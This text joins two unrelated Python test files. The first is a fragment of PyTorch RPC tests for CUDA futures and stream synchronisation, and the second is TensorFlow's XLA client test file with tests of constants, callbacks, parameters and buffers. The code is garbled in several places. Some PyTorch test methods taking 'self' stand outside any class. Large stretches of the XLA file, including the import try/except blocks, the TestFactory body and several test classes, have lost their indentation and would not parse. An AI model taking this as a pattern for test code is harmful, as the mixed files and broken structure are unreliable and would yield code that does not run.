    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_not_cuda(self):
        """A CPU device (no index) must be rejected."""
        with self.assertRaisesRegex(
            ValueError, "Expected devices to have indices, got cpu"
        ):
            fut = Future(devices=["cpu"])
    # --- Extraction of CUDA tensors from future values in various containers.
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_can_extract_cuda_tensor(self):
        self._test_cuda_future_extraction(
            wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
        )
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_can_extract_list_with_cuda_tensor(self):
        self._test_cuda_future_extraction(
            wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
        )
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
        self._test_cuda_future_extraction(
            wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
        )
    @skip_if_lt_x_gpu(2)
    def test_cuda_future_callback_changes_devices(self):
        # We check proper CUDA stream synchronization by filling the tensor with
        # the expected value in one stream, and reading it from another stream.
        tensor0 = torch.zeros((100,), device="cuda:0")
        tensor1 = torch.zeros((100,), device="cuda:1")
        parent_future = Future(devices=["cuda:0", "cuda:1"])
        def cb(fut):
            # Copy the parent's cuda:0 result over to cuda:1 asynchronously.
            t0 = fut.value()
            tensor1.copy_(t0, non_blocking=True)
            return tensor1
        child_future = parent_future.then(cb)
        with torch.cuda.device("cuda:0"):
            stream = torch.cuda.Stream()
            with torch.cuda.stream(stream):
                # Delay the fill so an unsynchronized reader would see zeros.
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor0.fill_(1)
                parent_future.set_result(tensor0)
        with torch.cuda.device("cuda:1"):
            another_stream = torch.cuda.Stream()
            with torch.cuda.stream(another_stream):
                self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
    @skip_if_lt_x_gpu(2)
    def test_cuda_future_value_on_bad_device(self):
        """Setting a result on a device outside Future(devices=...) must raise on wait()."""
        tensor0 = torch.zeros((100,), device="cuda:0")
        tensor1 = torch.zeros((100,), device="cuda:1")
        parent_future = Future(devices=["cuda:1"])
        # As a plus, we test that futures still invoke callbacks even in case of
        # error, and that the child futures are successful if those callbacks
        # don't access the parent future.
        def cb(fut):
            with torch.cuda.device("cuda:1"):
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor1.fill_(1)
                return tensor1
        child_future = parent_future.then(cb)
        with torch.cuda.device("cuda:0"):
            stream = torch.cuda.Stream()
            with torch.cuda.stream(stream):
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor0.fill_(1)
                # cuda:0 is not among the future's declared devices.
                parent_future.set_result(tensor0)
        with self.assertRaisesRegex(
            ValueError,
            r"The result contained tensors residing on device\(s\) cuda:0 "
            r"which are not among the expected device\(s\) cuda:1",
        ):
            parent_future.wait()
        with torch.cuda.device("cuda:1"):
            another_stream = torch.cuda.Stream()
            with torch.cuda.stream(another_stream):
                self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
    @skip_if_lt_x_gpu(1)
    def test_async_execution_with_cuda_future(self):
        """An @async_execution-style remote fn returning a CUDA tensor must be
        stream-synchronized when waited on from a different stream."""
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {"cuda:0": "cuda:0"})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        t = torch.zeros((100,), device="cuda:0")
        fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
        another_stream = torch.cuda.Stream("cuda:0")
        with torch.cuda.stream(another_stream):
            self.assertTrue(torch.eq(fut.wait(), 1).all().item())
        rpc.shutdown()
    @skip_if_lt_x_gpu(1)
    def test_async_execution_nested_with_cuda_future(self):
        """Nested async-execution adds (a + b + c across two hops) must total 3."""
        dst = worker_name((self.rank + 1) % self.world_size)
        nested_dst = worker_name((self.rank + 2) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {"cuda:0": "cuda:0"})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        a = torch.ones((100,), device="cuda:0")
        b = torch.ones((100,), device="cuda:0")
        c = torch.ones((100,), device="cuda:0")
        fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
        another_stream = torch.cuda.Stream("cuda:0")
        with torch.cuda.stream(another_stream):
            self.assertTrue(torch.eq(fut.wait(), 3).all().item())
        rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
    """In-place mutation of an already-set future value must not crash wait()."""
    value = torch.zeros((100,), device="cuda:0")
    fut = Future(devices=["cuda:0"])
    fut.set_result(value)
    # It's weird to modify the value of a future once it's complete, but
    # technically possible. Currently this is considered undefined behavior
    # (in practice the future will ignore the modification and still
    # synchronize with the original value). We could one day add logic to
    # detect and warn or throw in such cases, but for now we just check that
    # this doesn't crash.
    value.fill_(1)
    fut.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
    """Replacing a tensor inside a completed future's value must not crash."""
    holder = [torch.zeros((100,), device="cuda:0")]
    fut = Future(devices=["cuda:0"])
    fut.set_result(holder)
    # Modifying the value of a completed future is undefined behavior; we
    # only check that it doesn't crash. We set things up so that the
    # original tensor contained in the list gets deleted once we replace it
    # with the other one. This will invalidate any cached information held
    # by the future.
    holder[0] = torch.ones((100,), device="cuda:0")
    fut.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
    """RRef user functions work on a remote object holding CUDA state."""
    peer = worker_name((self.rank + 1) % self.world_size)
    opts = self.rpc_backend_options
    opts.set_device_map(peer, {"cuda:0": "cuda:0"})
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=opts,
    )
    remote_wrapper = rpc.remote(
        peer, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
    # Increment every element remotely, then sum: 42 zeros + 1 each == 42.
    remote_wrapper.rpc_sync().increase(1)
    self.assertEqual(remote_wrapper.rpc_sync().sum(), 42)
    rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
    """A bare CUDA sparse tensor can be extracted from a CUDA future."""
    identity = lambda v: v
    self._test_cuda_future_extraction(
        wrapper=identity, unwrapper=identity, sparse_tensor=True)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
    """A CUDA sparse tensor nested inside a list can be extracted."""
    self._test_cuda_future_extraction(
        wrapper=lambda t: [t],
        unwrapper=lambda v: v[0],
        sparse_tensor=True,
    )
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
    """A CUDA sparse tensor wrapped in a custom class can be extracted."""
    self._test_cuda_future_extraction(
        wrapper=TensorWrapper,
        unwrapper=lambda v: v.tensor,
        sparse_tensor=True,
    )
|
xla_client_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_] + complex_dtypes
class ComputationTest(parameterized.TestCase):
  """Base class for running an XLA Computation through the local client."""

  def setUp(self):
    super(ComputationTest, self).setUp()
    self.backend = xla_backend()

  def _NewComputation(self, name=None):
    # Default the builder name to the test id, which aids debugging.
    return xla_client.XlaBuilder(self.id() if name is None else name)

  def _Execute(self, c, arguments):
    """Compiles builder `c` and runs it on `arguments`, returning numpy values."""
    executable = self.backend.compile(c.build())
    return xla_client.execute_with_python_values(
        executable, arguments, backend=self.backend)

  def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
    """Executes `c` and checks each output against `expected` via `assert_func`."""
    assert expected is not None
    outputs = self._Execute(c, arguments)
    self.assertLen(outputs, len(expected))
    for got, want in zip(outputs, expected):
      # Numpy's comparison methods are a bit too lenient by treating inputs
      # as "array-like", meaning that scalar 4 will be happily compared equal
      # to [[4]]. We'd like to be more strict so assert shapes as well.
      self.assertEqual(np.asanyarray(got).shape, np.asanyarray(want).shape)
      assert_func(got, want)

  def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
    self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)

  def _ExecuteAndCompareClose(self,
                              c,
                              arguments=(),
                              expected=None,
                              rtol=1e-4,
                              atol=0):
    compare = functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol)
    self._ExecuteAndAssertWith(compare, c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
  """Builds a numpy ndarray whose dtype is pinned to np.float32."""
  array = np.array(*args, dtype=np.float32, **kwargs)
  return array
def NumpyArrayF64(*args, **kwargs):
  """Builds a numpy ndarray whose dtype is pinned to np.float64."""
  array = np.array(*args, dtype=np.float64, **kwargs)
  return array
def NumpyArrayS32(*args, **kwargs):
  """Builds a numpy ndarray whose dtype is pinned to np.int32."""
  array = np.array(*args, dtype=np.int32, **kwargs)
  return array
def NumpyArrayBool(*args, **kwargs):
  """Builds a numpy ndarray whose dtype is pinned to np.bool_."""
  array = np.array(*args, dtype=np.bool_, **kwargs)
  return array
class ComputationPrinting(absltest.TestCase):
"""Tests for printing, serializing, and inspecting compiled computations."""
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
# Builds (p0 * p1) + (p0 * p1): a scalar times a 4-vector, added to itself.
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
# The compiled module's text form should carry the module name and show
# that the mul+add was fused.
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
# Round-trip: module -> serialized proto -> XlaComputation -> module
# should preserve the HLO text exactly.
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
# One multiply plus one add over a 4-element vector = 8 flops.
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
# Only non-cloud TPU backends expose a non-empty fingerprint here; all
# other configurations are expected to return None.
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
# Scalar + scalar across all integer and float dtypes.
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
# Elementwise vector * vector.
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
# Vector / scalar; the scalar divisor broadcasts.
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
# Vector ** scalar.
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
# Iota produces [0, 1, ..., 9] as F32.
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
# Iota along dimension 1 of a (2, 3) shape repeats [0, 1, 2] in each row.
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
# Elementwise addition of two same-shaped 2D arrays.
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
# 3 << 2 == 12.
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
# Arithmetic shift preserves the sign bit: -2 >> 1 == -1.
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
# Logical shift fills with zeros: int32 -1 (all ones) >> 1 == 2**31 - 1.
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
# a*x + y with constant operands: 2 * [2.2, ...] + [100, ...].
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
# Registers the test custom-call targets and invokes the f32 subtraction
# target: 1.25 - 0.5 == 0.75. CPU only.
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
"""Tests for host-side Python callbacks embedded in computations (CPU only)."""
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
# NOTE(review): `keepalive` presumably anchors the Python callable for
# the executable's lifetime; it is only deleted after execution.
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testTokens(self):
# A token operand threads ordering through the callback; the callback
# itself receives None in the token position and returns None for the
# token result.
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
# The callback must observe the requested Fortran (column-major) layout.
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
  """Test computation execution from HLO proto."""

  def setUp(self):
    super(ComputationFromProtoTest, self).setUp()
    self.backend = xla_backend()

  def testExecuteFromProto(self):
    """Round-trips a computation through its serialized HLO module proto."""
    # Build a trivial 1 + 2 computation and serialize it.
    builder = xla_client.XlaBuilder("computation")
    ops.Add(ops.Constant(builder, np.int32(1)), ops.Constant(builder, np.int32(2)))
    serialized_proto = builder.build().as_serialized_hlo_module_proto()
    # Reload the proto and verify that executing it still yields 3.
    computation = xla_client.XlaComputation(serialized_proto)
    result, = xla_client.execute_with_python_values(
        self.backend.compile(computation), (), backend=self.backend)
    np.testing.assert_equal(result, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
# Scalar * vector with operands fed at execution time (not constants).
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
  """Tests focusing on execution with Buffers."""

  def testConstantSum(self):
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
    self._ExecuteAndCompareClose(c, expected=[4.25])

  def testOneParameterSum(self):
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Constant(c, np.float32(3.14)))
    self._ExecuteAndCompareClose(
        c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])

  def testTwoParameterSum(self):
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
    self._ExecuteAndCompareClose(
        c,
        arguments=[NumpyArrayF32(1.11),
                   NumpyArrayF32(3.14)],
        expected=[4.25])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testCannotCallWithDeletedBuffers(self):
    # Executing against a deleted buffer must raise rather than crash.
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Constant(c, np.float32(3.14)))
    arg = NumpyArrayF32(1.11)
    compiled_c = self.backend.compile(c.build())
    arg_buffer = self.backend.buffer_from_pyval(arg)
    arg_buffer.delete()
    with self.assertRaises(RuntimeError):
      compiled_c.execute([arg_buffer])

  def testXlaShape(self):
    pyval = np.array([[1., 2.]], np.float32)
    local_buffer = self.backend.buffer_from_pyval(pyval)
    xla_shape = local_buffer.xla_shape()
    self.assertEqual(xla_shape.dimensions(), (1, 2))
    self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))

  def testXlaShapeIndex(self):
    # ShapeIndex equality is structural.
    a = xla_client.ShapeIndex((1, 2))
    b = xla_client.ShapeIndex((1, 2))
    c = xla_client.ShapeIndex((2, 3))
    self.assertEqual(a, b)
    self.assertNotEqual(b, c)

  def testLayout(self):
    # Layouts compare (and hash) by their minor-to-major order.
    f32 = xla_client.PrimitiveType.F32
    a = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
    b = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
    c = xla_client.Shape.array_shape(f32, (2, 3), (1, 0)).layout()
    self.assertEqual(a.minor_to_major(), (0, 1))
    self.assertEqual(b.minor_to_major(), (0, 1))
    self.assertEqual(c.minor_to_major(), (1, 0))
    self.assertEqual(a, b)
    self.assertNotEqual(a, c)
    self.assertNotEqual(b, c)
    self.assertEqual(hash(a), hash(b))
    self.assertNotEqual(hash(a), hash(c))
    self.assertNotEqual(hash(b), hash(c))

  def testBlockUntilReadyWorks(self):
    arg = np.array([[1., 2.]], np.float32)
    arg_buffer = self.backend.buffer_from_pyval(arg)
    arg_buffer.block_until_ready()
    # This test merely checks that nothing goes awry when we call
    # block_until_ready(); it's difficult to test anything else.

  def testBlockUntilReadyRaisesOnDeletedBuffer(self):
    arg = np.array([[1., 2.]], np.float32)
    buffer = self.backend.buffer_from_pyval(arg)
    buffer.delete()
    with self.assertRaisesRegex(
        RuntimeError,
        re.escape(
            "BlockHostUntilReady() called on deleted or donated buffer")):
      buffer.block_until_ready()

  def testDeviceArrayBaseSignatures(self):
    # When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
    # and thus needs to correctly implement the following methods.
    arg = np.array([[1., 2., 3.]], np.float32)
    buffer = self.backend.buffer_from_pyval(arg)
    if not isinstance(buffer, xla_client.DeviceArrayBase):
      # Fixed message: previously read "The objectof type {} do not extend".
      raise unittest.SkipTest(
          "The object of type {} does not extend DeviceArrayBase".format(
              type(buffer)))
    self.assertEqual(buffer.__array_priority__, 100)
    self.assertEqual(buffer.shape, (1, 3))
    self.assertEqual(buffer.dtype, np.float32)
    self.assertEqual(buffer.size, 3)
    self.assertEqual(buffer.ndim, 2)
    self.assertIs(buffer, buffer.block_until_ready())
    buffer.delete()
    with self.assertRaises(RuntimeError):
      buffer.block_until_ready()

  def testOnDeviceSizeInBytes(self):
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
